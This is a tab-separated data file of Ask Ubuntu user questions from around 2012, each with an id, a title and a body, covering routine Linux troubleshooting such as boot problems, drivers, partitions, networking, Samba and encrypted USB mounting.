213399	power & sleep management	i 'm running 12.10 with xmonad . trying to ensure that the right things happen when i close laptop lid , etc . i see internet search results for similar issues that mostly point towards gnome-power-manager . i have the package installed , but gnome-power-manager is not in my path anywhere . the behavior i 'm looking for is as following : sleep on lid close awaken on lid open turn off screen after 10 idle minutes most importantly , have better battery life . i 'm supposed to be getting 9 hours and i have n't seen the battery life estimate above 2.5 hours yet . any tips on where to look or how to configure this would be much appreciated .
213402	how to fix wine mcf42.dll error on lucid ?	i 'm trying to run visual boy advance and when i use the command wine visualboyadvance i get the following error : err : module : import_dll library mfc42.dll ( which is needed by l '' z : \\home\\zack\\desktop\\vba\\visualboyadvance.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' z : \\home\\zack\\desktop\\vba\\visualboyadvance.exe '' failed , status c0000135 and i do n't have a clue on how to fix this .
213409	remove ubuntu 12.10 without reformat ?	i was recently told that using lubuntu or xubuntu would be better for my old machine than just plain old ubuntu . would i use wubi to uninstall ubuntu 12.10 and then cancel the install ? thanks !
213411	installing scanner driver for brother mfc295cn	i am trying to get the scanner working on my brother mfc295cn all-in-one , but brother 's website is so confusing that i ca n't figure it out to save my own life . is there anyone who has done this successfully , and if so , can you explain how you installed it ? thanks : )
213412	install grub without linux	my brother wants to get windows 7 64 bit alongside his windows 7 32 bit . how can i install/modify grub onto his computer in order to create easy boot options without having to install a linux distribution . i know this is n't really a linux question and iâm sorry about the off topic , but this website will probably give me the best answers to grub .
213413	can not resize ubuntu partition	i 've been using ubuntu for about a month now , and i 'm still having difficulties adopting to it . one issue that i 've been facing for few weeks now is that the ubuntu partition is running out of space ( i setup only 6gb of space for it and now i have less than 300mb available ) . i tried to follow the instructions which i 've found in some threads here , but non worked . i 'm trying to add the 3.79gb ( sda7 ) to ubuntu partition ( ext4 ) . when i click the right button over ext4 , the only options i have are [ unmount , manage flags , information ) ... and while sda7 only [ delete , format to , manage flags , information ) are available . can anyone tell me , what am i doing wrong ?
213418	which media server for these requirements	i 'm running ubuntu 12.04 server edition and am looking for a media centre server daemon that meets the following requiments : upnp/dlna streams photo audio and video transcode video from h264 mkvs on the fly based on the client , considering codecs on the device and resolution . i have panasonic tv that will play mpeg2 and divx and an ipad and a couple of iphones in he house i 've looked at mediatomb , but i 've read it not working correctly in newer versions of ubuntu . minidlna , but it does n't transcode , and the transcode branch does n't vary transcoding by client . rygel requires gnome which feels a bit dirty on my ubuntu server edition . i looked briefly at ps3 media server , ushare , twonky , etc , none seem to do it all , and will work on 12.04 . has anyone else tried to set something up like this and did you manage to meet all these requirments ?
213419	auto-remove or disable broken ppa 's ?	is there a command or program that can ping all ppa 's on your system , and if they fail will automatically disable or remove the ppa ?
213421	can ubuntu defragment ntfs or fat drives ?	can i use ubuntu to defrag a windows ntfs/fat drive or partition ?
213423	usb speakers are recognised , but ca n't be selected in sound menu	i have usb speakers that used to work with ubuntu . in 12.10 i can see them through lsusb ... bus 006 device 006 : id 0e6a:0310 megawin technology co. , ltd ... and i can see it in the `` hardware '' tab in the sound menu ... ... but i ca n't select them in the output tab .
213424	12.10 unity is gone after update	i just did some routine updates through the update manager , and upon the requested reboot , both the unity panel and bar are gone . desktop notifications are still there , though the rendering seems broken , and it 's black opaque where the alpha should be . luckily i can still run a web browser since i had a firefox shortcut on my desktop . i have tried— checking ccsm to make sure the unity plugin was turned on — it was . running unity -- reset in the terminal — it said the reset function was `` deprecated '' .
213428	ca n't boot from usb flash drive ( thinkpad t430i )	i had a wubi install to try ubuntu out , and decided that i want to do a proper install . i uninstalled wubi , downloaded ubuntu desktop 12.10 ( 32-bit ) and put it on an 8 gb fat32 usb flash drive ( following the instructions on the website and using the linux usb installer ) . i am using a brand-new lenovo thinkpad t430i ( running windows 7 ) . i have manually set the boot order so that usb hdd is first . i bring up the boot menu ( f12 ) and select the usb hdd device , and here 's what happens : the blue light on the usb stick flashes , then stops , and the computer remains on a black screen indefinitely ( i 've waited this out for 10 minutes ) . i tried doing the same routine , but with the 64-bit version of 12.10 , and still no luck . i 've looked through google/forums for advice , but ca n't seem to find a resolution for my problem . thanks !
213430	intermittent freezing on a macbook pro 7,1	i recently installed ubuntu 12.10 on my macbook pro 7 , 1 . i used to have 11.10 on it . i 've encountered a problem were i can boot up and the login screen works flawlessly . when i attempt to log into my account i set up during install it would only show the default wallpaper and the mouse was frozen . in other words it was logging on but froze up . is what it seems like . when i rebooted i attempted to log into the guest account . i was able to log in and it seemed everything worked so i tried to update everything figuring it may be the problem . after updating and restarting as prompted i tried to login to my account . it still froze up but this time showing `` glitched up '' ( you can see the dock and status bar but they do n't look like they should ) and still freezes . this is all happening on the guest account to . i was unable to find a similar article on the internet therefore i am asking ; any thoughts ubuntu ?
213432	problem with free space	i was zeroing out the free space on my ubuntu 12.04 using sfill , when the command stopped responding and i had to reboot the machine . now , the system says that it has no space left , and that it is running in low graphics mode . before this happened , i had nearly 500 gig free . df says there are 0 bytes free . df -i reports only 2 % of inodes used . i 've run fsck and it did n't resolve the issue . what can i do to resolve the issue ?
213434	accessing my `` real '' ubuntu from inside windows with vmware ?	is it possible to access and modify my `` real '' ubuntu which is on a different partition from a program such as vmware ?
213435	software sources not found 12.10	when i go to click on a program , there 's no 'download ' or 'install ' or anything , just 'more info ' and when i click on it , i get this : not found '' there isn’t a software package called “ < insert program name here > ” in your current software sources . '' for the longest time flash would n't install into i got around it some how .
213437	how do i install ubuntu without using a livecd/usb ?	there appear to be two types of ubuntu installations : 'live ' installations ( typically usb or cd ) and what i 'm going to call 'full ' installations ( typically on an internal hdd ) . full installations can use `` startup disk creator '' to create live installations , and live installations ask if you would like to try ubuntu or install to a hard drive , creating 'full ' installations . how can i create another 'full ' installation on another partition/disk , without creating an intermediate bootable 'live ' medium ? this seems like it should be simple . example scenario : a computer with four partitions : swap , /home , / , and one blank . ubuntu 12.04 desktop is currently installed on partition 3 . i would like to install 12.04-server on the 4th partition . i have the .iso saved on the drive ( /home partition ) . how do i perform a full ( not 'live ' ) install of 12.04-server to the fourth partition without buying a usb stick or cd drive ?
213439	unstable wifi and spontaneous low-graphic error with pavilion dv4	i 've been having numerous problems with connectivity through wifi . it had been working for a few days and now it does n't . on top of that around 40 % of every time i turn on the laptop it shows `` system running in low-graphics '' error and i 'm unable to view the desktop ( sometimes not even able to access terminal ) , therefore having to manually power-down until it finally works . i use ubuntu 12.10. nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : 84:34:97:6b:2e : d7 capabilities : carrier detect : yes speed : 10 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.10 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 dns : 68.237.161.12 - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rt2800pci state : unavailable default : no hw address : 68:94:23:50 : a5 : d9 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points
213445	how to install samba and share directory and printer	i am trying to get samba working on ubuntu to share a directory and a printer over the network to a windows pc , only ... when i install it i ca n't get the link for the gui , and i can get no where with it . could someone help me on how to set this up ? thanks : )
213451	12.10 pixelated text/images	i just did a clean install of ubuntu 12.10 . during the install i noticed some of the text during installation was pixelated . now i noticed it has carried over to parts of the gui . the ubuntu software center has some pixelated text and images . ..and then while installing gimp to upload and take this picture it happened again . has anyone seen this before ? if so , whats a fix .
213452	how do i select which folder to sync ?	my ubuntu one account is nearly full with various folders for almost 5gb . on the computer i 'm working on , my /home does not have even half that space . since i only need a few folder for my current work , how can i select these only ?
213460	dpkg : error : parsing file '/var/lib/dpkg/updates/0045 ' near line 0:	i am getting this error in ubuntu 12.04 , while doing the below operation . frank @ august : ~ $ sudo apt-get install ttf-mscorefonts-installer [ sudo ] password for frank : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . frank @ august : ~ $ sudo dpkg -- configure -a dpkg : error : parsing file '/var/lib/dpkg/updates/0045 ' near line 0 : newline in field name ` # padding' frank @ august : ~ $ & frank @ august : ~ $ head /var/lib/dpkg/updates/0045 # padding # padding # padding # padding frank @ august : ~ $ i ca n't see where is the error , help me to solve this . thank you .
213463	desktop empty under ubuntu 12.04	my problem is that my desktop is empty -- there are no files or directories in it . the launcher on the left and the menu at the top are both ok . but , after a recent upgrade from 12.04 to 12.10 , everything in my desktop was emptied . i do have files in my ~/desktop directory , which is what i want displayed . in ~/.config/user-dirs.dirs , i also have xdg_desktop_dir= '' $ home/desktop/ '' . is there something else i should be looking for ? i actually have another ubuntu machine and i do n't have the same problem there after upgrading . so , i do n't think this is a bug with 12.10 but just some setting ( a package , etc . ) that was set in one machine but not the other . oh , i am not sure if this is related to nautilus , but the two machines have the same nautilus-related packages installed ... any help would be appreciated !
213465	cisco vpn anyconnect freezes	since yesterday ( perhaps some system updates ) , the cisco anyconnect vpn makes the system freeze when i try to connect . it looks like a memory leak , since the memory used goes up to 90 % . i am using kubuntu 12.04 .
213471	mount : `` the disk drive for uuid= < uuid for / > is not ready yet or not present . ''	i recently did the update from 12.04 to 12.10 on my old dell latitude cpx laptop ( pentium iii ) . when i rebooted i got this error message with no response from keyboard input . below it is says wait to continue , press s to skip mounting , or m for manual recovery . i also see occasional errors pop up on the screen from mountall and plymouth . i can still get into recovery mode . can anyone shed some light on the matter ? update : i redid my fstab , to no avail . now my screen is flashing on and off from the ubuntu 12.10 splash screen to a black screen . i would really love to avoid a reinstall ...
213483	how to execute for loop with sed in terminal	i want to execute the for loop with sed command , and is getting an error for the same for i in < comma-separated server name list > ; do `` command '' ; echo $ i ; done where command=sed '/^ $ /d ' /home/nextag/instance.properties|grep -vc ' # ' i 'm getting the following error : - -bash : sed `` /^ $ /d '' /home/nextag/instance.properties|grep -vc # : no such file or directory lu1 what is the correct way to execute this command to get the perfect output i tried this as well > > for i in lu1 ; do 'sed \'/^ $ /d\ ' /home/nextag/instance.properties|grep -vc \ ' # \ '' ; echo $ i ; done also , can some explain the part '/^ $ /d'in sed '/^ $ /d ' /home/nextag/instance.properties|grep -vc ' # '
213485	which usb data card or modem will be supported in ubuntu ?	i am a new ubuntu user from ubuntu and i want to buy a usb data card for my laptop . i want to know which usb data card brands are supported in ubuntu ? i heard from some of my friends that they had problems in ubuntu with
213489	adding apache to user group	ok. total beginner question , please bare with me . we have a small lamp server running ubuntu 12.04 lts which contains a few sites . access to the vhosts directories is set to root : andspecialsftpgroup . this works fine in general . however , some of the sites run on a cms which need write access to particular folders . this is now not working , because the apache user is www-data . simple question : is ok to add the www-data to the andspecialsftpgroup group in order to grant it rwx permissions . or is this the wrong approach altogether . or should the owner of the website folders be www-data ?
213493	12.04 can not boot from usb	the hp pavilion g6 notebook is unable to boot from bootable usb stick created with linux live usb creator . i was able to boot other systems using the same pendrive . i have changed the boot priority using f10 . when i restarted , it did n't ask for any message like press any key to boot from when i press f19 , and selected the pendrive from the available options to boot from , while restarting it gives me a message : error while trying to boot selected boot image though i looked into the possible suggestions here , none of them worked . looking for any help ? edit : i was able to fix the first issue , i'e ubuntu could be installed as secure boot option in the bios was not allowing the pendrive or cd/dvd to be detected . now once i have successfully installed ubuntu 12.04 , after the restart i was unable to find it in the os menu for selection and windows8 loaded by default ubuntu version : 12.04
213497	upgrading 11.04 to 12.10	i am using ubuntu 11.04 and want to upgrade to latest version 12.10. but i can not get either software center manager or synaptic to open , i just get error messages . i have downloaded iso of 11.10 for an incremental install , mounted it but it will not run . get an error message stating can not find autorun file . how to upgrade incrementally ? can i fix software center ?
213501	failure : does_not_exist , ubuntu one , high cpu usage , no syncing	over the weekend i updated my computer to windows 8 . so far ubuntu one was running smoothly , but ever since the update ( clean , new install ) ubuntu does n't sync any more . in windows 7 it would start to sync at full internet speed as soon as i drop a file . but now in windows 8 , as soon as i drop a new file into the ubuntu one folder , cpu usage goes up to about 50 % and no network traffic occurs . this stays like that for a couple of minutes , cpu usage goes back to normal and then the client says that all is in sync - which is n't true . is it too early for windows 8 ? do others have the same problem or is there something i can do about it ? i try a couple of different things , and realized that if the file size is 20 mb the files get uploaded . the original file was 1.5 gb . i also did n't work with 200 , 100 and 50 mb large files . but even with 20 mb large files , the upload is very slow and not steady . but not all files get uploaded , only about 10 % . here 's a link to the relevant part of the log , when i try to upload one single large file : http : //pastebin.com/z1v07nsd which i do n't really understand . it seems to start the upload but then stops with : failure : does_not_exist , but the file is there . by the way , the account works just fine on the ubuntu 12.04 partition .
213509	gnome-online-account remembers my google password ?	i just added my google account to gnome-online-account , assuming it 'd use oauth . i should mention i use two factor authentication . i wrote in my google password + my verification key ( but chose not to save it ) . after rebooting and reconnecting it said my account needed verification . i clicked the icon , clicked no `` grant access '' , and got up my google login page , with the password apperantly already written in . i could click next and write in my verification code . is my password stored anywhere , or is authentication with a token still giving me a login page with the password apperantly written in when it needs to verify my account ?
213511	how to format a sd card easily in kde ?	first i want to clarify that i know how to do this with programs like kde-partitionmanager or gparted . what i am really looking for is a easy way such as right click in dolphin on my sd card or usb pendrive and select format drive . i think i just ca n't figure out the easy way . think about the way you would tell the non-sudo user how to format his sd-card .
213512	`` buffer i/o error on device fd0 , logical block 0 '' error	i am using ubuntu 12.10 , today update notification popped up and i updated the system , then it asked for restart , i was doing some stuff so i restarted after ~30 minutes , after restart , ubuntu gui was gone , there was no taskbar or unity , i fixed by entering this commands : sudo apt-get install linux-source sudo apt-get install linux-headers-generic sudo apt-get remove nvidia-current-updates sudo apt-get install nvidia-current-updates ... these commands fixed almost everything , unity is running , but there 's problem when i go in terminal ctrl+alt+f1 , before i write anything , many many messages appear , it says `` buffer i/o error on device fd0 , logical block 0 '' , what should i do ? here 's image : http : //i.imgur.com/jbd5x.jpg another thing i noticed is that after few about an hour , messages disappear , this error keeps showing up for first hour roughly .
213516	making ubuntu my only os using wubi	i have never used ubuntu before . i am currently running windows 8 and have installed ubuntu 12.10 using the wubi install kit . my comp . will not recognize a dvd drive for now . i want to destroy windows 8 , while keeping personal files , and make ubuntu my only os . how do i do this ? the problem being that i can not create a disk ... so i am looking to accomplish a full install with only the use of wubi
213517	how to change wget default directory from 'videos ' to 'downolads ' ?	i use the combination of flashgot and wget for downloads . i reset my firefox preferences due to some other problems . then i reconfigured everything ( including add-ons , cache , etc ) . after that , when i tried to download something , it automatically saved into the `` videos '' folder . but before resetting the settings , i could download items to `` downloads '' . what should i do to make the default directory of wget to `` downloads '' ?
213520	require password to login to nexus 7	the default behavior in the nexus 7 image is to log straight in to the default user 's desktop , bypassing the lightdm greeter . this seems like an acceptable behavior for testing the core but it 's clearly insecure . i 've changed the default password and would like lightdm to actually require the password to be entered , rather than just having a button that says `` login '' . i 've turned automatic login on and off in system settings â user accounts but this does n't help . any suggestions ?
213523	internal hard disk partitions ( sda2 ) not showing in android system	there is android os install in my laptop . i have a total hard disk of 232 gb , in which 4 gb allocated for android and rest i do n't know where it gone . on open super user and running this command in android terminal : cat /proc/partitions i get following result : block_size ( 232gb ) sda block_size ( 4gb ) block_size ( rest ) sda2 this show there is two partitions ( sda1 , sda2 ) of total drive ( sda ) . since android install in sda1 and seen in it 's file system . but sda2 data is invisible . how can i mount this drive in android . i just want to access and visible the sda2 storage drive . help me
213527	how to boot ubuntu on a usb external hd without bios support ?	i am still trying to find a solution to this problem : boot xubuntu 12.04 from a usb 2.0 external hd when the pc 's bios does not allow booting from a usb . i have tried plop , and plopkexec . that did n't work for me . i 've given up on them as a solution to my problem . however , i came across these : https : //help.ubuntu.com/community/bootfromusb http : //www.pendrivelinux.com/make-a-usb-boot-cd-for-ubuntu-11-10/ i think either of these will do what i want to do . my only concern is the use of grub in these solutions rather than grub2 . the xubuntu i want to boot is installed with grub2 . can someone show me how i can build the boot cd described in the bootfromusb write-up above , but with grub2 , rather than grub ? or perhaps point me to some appropriate documentation .
213528	flashgot icon not appears on firefox bar ?	i reset my firefox settings . before reseting firefox , there was an icon appeared on firefox ( beside address bar ) of flashgot when watching flash videos . now it is not showing there..after reseting the firefox . i reconfigured every add-ons and all . but it is not showing up ? ?
213531	ugly fonts with nvidia drivers	just installed nvidia binary drivers today and the fonts are ugly . i 've been using the opensource nouveau drivers all this while and the font 's were much better . even the expo effect in compiz was crisp , but now with the binary drivers the fonts look jagged and ugly and the effects not as smooth ( which is surprising as the effects use 3d acceleration ) . the difference is not much but long hours of work makes my eyes hurt . i primarily installed the binary driver for vdpau in order to play 1080p videos which do work better now . even games run faster ( but i do n't play games that much . is there a way to get better font rendering with the nvidia binary drivers as the nouveau drivers do . it 's probably some antialiasing setting that i ca n't seem to find . thanks in advance !
213532	writing a simple firewall with iptables	i 'm learning how to use iptables and i 'm writing a very simple firewall on ubuntu . using just the filter table , i added the following rules iptables -p input drop iptables -p output drop iptables -p forward drop as i want to let pass just the packets i desire . then i tried to add rules to make simple http connections , and so , for a very first attempt , i added iptables -a input -p tcp -j accept iptables -a input -p udp -- sport 53 -j accept the first line to accept all tcp traffic and the second to accept dns answers . similarly , for the output chain , i added iptables -a output -p tcp -j accept iptables -a output -p udp -- dport 53 -j accept but when i try to use lynx the connection does n't take place . i think the only problems is the dns , since all the tcp traffic is accepted . but packets to/from port 53 can pass through the firewall ... so , where the problem is ? i added the following two rules and now it works . iptables -a input -i lo -j accept iptables -a output -o lo -j accept and using wireshark i realized that dns requests are also to/from loopback interface . i never imagined that ... why ?
213533	command to move a file to trash via terminal	i would like to know if there is a command i can issue in a terminal so i do not classically remove ( rm ) the file , but instead move it to trash ( i.e . nautilus move to trash behavior ) . in case there is such a command , i would also be interested in knowing what it is . edit : this is not a duplicate of this question . there , the foxus is whether files removed using rm in terminal can be restored -- i 'm asking how to put files in the trash can instead of removing them .
213535	how to increase my ubuntu disk space ?	i installed ubuntu 12.04 alongside windows 7 . during ubuntu installation , i shrinked the windows drive 10gb and ubuntu installed in this space . now i want to increase this space . i again shrink the drive to make another 10gb unallocated space . can i add this space to the ubuntu disk space ?
213536	skype packages broken while trying to install from usc	ubuntu 12.10 64 bit here , it seems i have the same problem with this guy : https : //bugs.launchpad.net/ubuntu/+source/software-center/+bug/1074309 i ended up installing a deb from skype.com but now when i try to open update manager : w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 91.189.92.191 80 ] , w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead .
213537	can not mount luks encrypted usb on boot after 12.10 upgrade	i use a usb disk to backup my ubuntu machine and store the video files i work with . it is formated to ext4 and uses luks encription . when i was using 12.04 it was working flawlessly and would mount automatically in every reboot . i just had to enter the passworkd once in a window where i also told the system to remember it forever . it no longer mounts after i upgraded to 12.10 . i 've tried the different uuid and the /dev/mapper in /etc/fstabbut it never gets to work at startup . i get the error that the drive failed to mount and offers me to mount it manually or skip . it may be related to a change in the way disks are mounted in 12.10 , where i found that in the /media folder there 's now a subfolder for my user and then the disks mount in their own subfolders within that one . i 've managed to make my current fstab setup work after boot but only after first mounting the drive via the app disks , after i enter the password there . if i do n't go through that first i get an error message telling me that the disk does not exist . in these pastes from the terminal you can see the difference in blkid after i used the disks workaround : ramon @ ramon-ldc-20120921 : ~ $ sudo mount /media/ramon/respaldo/ [ sudo ] password for ramon : mount : special device uuid=34241b59-8d65-4e8a-bda4-ef4ab6935eb3 does not exist ramon @ ramon-ldc-20120921 : ~ $ sudo blkid /dev/sda1 : uuid= '' 71acf30d-abe7-41f1-b678-e9d5db5fa04f '' type= '' ext4 '' /dev/sda5 : uuid= '' 944dde6d-6232-4b96-b347-4d3dff2994f3 '' type= '' ext4 '' /dev/sdb1 : uuid= '' 841e796b-e384-4b83-9432-10fa0d863600 '' type= '' crypto_luks '' here i used the disks app to mount the disk : ramon @ ramon-ldc-20120921 : ~ $ sudo blkid /dev/sda1 : uuid= '' 71acf30d-abe7-41f1-b678-e9d5db5fa04f '' type= '' ext4 '' /dev/sda5 : uuid= '' 944dde6d-6232-4b96-b347-4d3dff2994f3 '' type= '' ext4 '' /dev/sdb1 : uuid= '' 841e796b-e384-4b83-9432-10fa0d863600 '' type= '' crypto_luks '' /dev/mapper/luks-841e796b-e384-4b83-9432-10fa0d863600 : label= '' respaldo '' uuid= '' 34241b59-8d65-4e8a-bda4-ef4ab6935eb3 '' type= '' ext4 '' this is the line i have right now in my /etc/fstab : uuid=34241b59-8d65-4e8a-bda4-ef4ab6935eb3 /media/ramon/respaldo ext4 defaults 0 2 i 've already done some research and have not found an answer here in askubuntu nor elsewhere . i even tried with a couple programmers that use ubuntu in my coworking space , but they 've never faced such issues before and all we could get to do is what i 've shared here . what i want is that the disk automounts everytime i boot the computer . thanks to all for your help and for spending your valuable time going through this post .
213543	how can i move amazon search results into a dedicated shopping lens and out of the home lens ?	i do n't want amazon search results to show up in the home lens and prefer to access them in an independent shopping lens . how can this be accomplished ?
213548	how to install android image in laptop ? how to make android bootable image for laptop ?	i have android source code image and i want to install it on laptop . i want to know how we made bootable image for laptop with android image . what i have to do so that laptop detect the android image . there is some site which provide android image for laptop , in which i have to download image but i want my android image been install in laptop . is any tool is present which make boot loader for android image .
213550	how do i get an acer npilfy 802.11 ( bcm43225 ) wireless card working ?	my laptop is acer 5742g with `` npilfy 802.11 wireless '' . i have both windows 7 and ubuntu 12.10 earlier when i had ubuntu 12.04 , the wireless was working fine , but after installing 12.10 wireless is not working at all , although it is still working in windows . i am not able to see `` wireless networks '' in the network manager nor in the network settings . this was the output i got for rfkill 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no 1 : acer-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no this is a snapshot of my additional drivers settings . as you can see , the required driver for wireless is installed .
213551	how to enable/disable items in the messaging menu ?	back in 12.04 , , all items that had messaging menu integration are shown in the messaging menu . however , in 12.10 , this is n't the case . 3rd party items are n't showing up in the messaging menu . well , at least for me . i 've only got empathy , gwibber , and the webapps . what i 'd like to do is add polly to the messaging menu instead of gwibber ( i already uninstalled gwibber ) , hide the webapps when they 're not active and enable some of the 3rd party problems that i have installed . how can this be done with the least fuss ? also , is it possible to do through a gui ?
213554	reporting an error from an undetermined package	i am using ubuntu 12.04 and regularly get errors related to printing on an hp750 psc . i am asked to accept filing a report , which i do and then the message returned is could not determine package or source package name . does this mean that there are persistent problems that can not be reported back , and are therefore not being addressed ?
213556	mirroring two files : rsync vs cp	i 'd like to have a copy of my .emacs file in my dropbox folder but i 'd also like to have this copy in an automatic way , i mean every time i change my .emacs in the home directory i want it to be instantly updated in the dropbox directory ( this necessity is because i want the .emacs to be equal in my windows and ubuntu partitions and i think dropbox is a good tool for that ) . first i used the simple : $ cp .emacs dropbox/.emacs then i tried using rsync ( or gsync ) , well it works but i can not grasp the difference between rsync and cp for this very simple backup . in fact , even if i have activated the option rsync_enable=true in the rsync file , every time i modify the .emacs in my home i have to run the command rsync ( or use gsync ) , as a cp , without having it automatically . how can i have it automatically ? probably i 'm missing something from the very basics of rsync . thanks for your help
213560	internet access problem in 12.10	using ethernet connection , i can not establish a internet connection on my chromium browser , received a dns error ( or something related to that . i am very sure that i do n't have any parental controls . recently uninstalled apache2 . wireless internet works . need more infos , please answer . notes : when i tried to access internet through firefox , it does not work too . the internet connection works perfectly on my mac . using the same pc , i tried to install windows and tried the network , it does not work too . looks like it only works on separate computers ( different computers ) . results from past tests : $ ifconfig eth0 link encap : ethernet hwaddr 00:23:8b : c9 : c3:0c inet6 addr : fe80 : :223:8bff : fec9 : c30c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:84 errors:0 dropped:0 overruns:0 frame:0 tx packets:1904 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:13190 ( 13.1 kb ) tx bytes:155642 ( 155.6 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:773 errors:0 dropped:0 overruns:0 frame:0 tx packets:773 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:67773 ( 67.7 kb ) tx bytes:67773 ( 67.7 kb ) wlan0 link encap : ethernet hwaddr 00:22 : fa : dd : d5:8e inet addr:192.168.1.106 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :222 : faff : fedd : d58e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11885 errors:0 dropped:0 overruns:0 frame:0 tx packets:6671 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17038008 ( 17.0 mb ) tx bytes:592304 ( 592.3 kb ) command : sudo lshw -c network $ sudo lshw -c network *-network description : ethernet interface product : 88e8072 pci-e gigabit ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 16 serial : 00:23:8b : c9 : c3:0c size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : c0400000-c0403fff ioport:3000 ( size=256 ) memory : c0700000-c071ffff *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 00 serial : 00:22 : fa : dd : d5:8e width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-17-generic more information : i have checked , trying to boot into windows , neither the network using ethernet worked there . i tried to diagnose it , here is the result : your computer appears to be correctly configured , but the device or resource ( dns server ) is not responding . i believe i tried both wall power and battery power . 2 . i use ubuntu desktop , so `` networkmanager '' .
213566	upgrade 12.04 to 12.10 not showing up with update manager	we have a local ubuntu repo at our insti . let us suppose that i have an 12.04 machine with the repo settings as follows : deb http : // < server-name > /ubuntu precise main restricted unverse multiverse deb http : // < server-name > /ubuntu precise-backports main restricted unverse multiverse deb http : // < server-name > /ubuntu precise-updates main restricted unverse multiverse deb http : // < server-name > /ubuntu precise-security main restricted unverse multiverse deb http : // < server-name > /ubuntu precise-proposed main restricted unverse multiverse deb-src http : // < server-name > /ubuntu precise main restricted unverse multiverse deb-src http : // < server-name > /ubuntu precise-backports main restricted unverse multiverse deb-src http : // < server-name > /ubuntu precise-updates main restricted unverse multiverse deb-src http : // < server-name > /ubuntu precise-security main restricted unverse multiverse deb-src http : // < server-name > /ubuntu precise-proposed main restricted unverse multiverse suppose , i were to change precise to quantal in this list , will my machine upgrade . please tell me this as my 12.04 machine is not upgrading to 12.10 . i have tried all hooks and crooks as given in the various ubuntu related forums . the normal upgrade method as mentioned on the ubuntu website fails in my case .
213569	i accidentaly closed the window for the verfication code	i wanted to create an account for ubuntu one , but i got impatient when the email with the verification code did n't arrive ... . so i thought i might have typed the wrong andress , closed the window and tried again . it told me the adress already existed and i just got the code . but well the i closed the window and i wonder if there is a way to re-open the window ?
213575	how to promote ldap user to adminstrator role ?	i am doing this project to centralize the auth from openldap , i trap the problem below : now my ldap users asign to the sudo group ( command 'id ' ) , so i can do all the implent from the command terminal , but in the user-account box ( right top desktop screen ) , it display standard role for my ldap user , every time ldap user change his password , they should type the administaror 's password , but its password unkown to the ldap users . can promote ldap user to adminstrator role ? any script method ? i have 500+ ldap user auth .
213579	system memory reporting	when logging into my ubuntu server 12.04 lts ( vps ) , i get some nice stats upon login ( or $ landscape-sysinfo ) : system information as of tue nov 6 05:41:06 est 2012 system load : 0.0 processes : 90 usage of / : 22.3 % of 8.51gb users logged in : 0 memory usage : 25 % ip address for eth0 : xx.xx.xx.xx swap usage : 7 % if i run : $ free -m total used free shared buffers cached mem : 487 419 67 0 9 117 -/+ buffers/cache : 293 193 swap : 255 19 236 i see that the memory is different . i 'm running a virtual private server that in which i pay for 512mb ram . is that the difference i 'm seeing here , that 'landscape-sysinfo ' calculates based on the entire machine and 'free ' calculates based on my allowed quota ? i saw a similar post here but it does n't solve my exact issue . thanks for your time .
213581	get location of `` true '' gvfs path from nautilus	i mount my samba shares through nautilus . i know that , behind the scenes , the share is fuse-mounted and nautilus somehow does the translation between smb : // urls and the actual location in the file system . is it possible to retrieve the `` true '' path in the file system for a gvfs-mounted share , for a directory or a file ? how ? edit : if anything else fails , one could invent a tool that is applicable to any file and would just copy the command-line parameter to the clipboard . then it would just be required to tell nautilus to offer this tool for all files and directories . this is related , but does not answer my question : how to copy the current path from nautilus ?
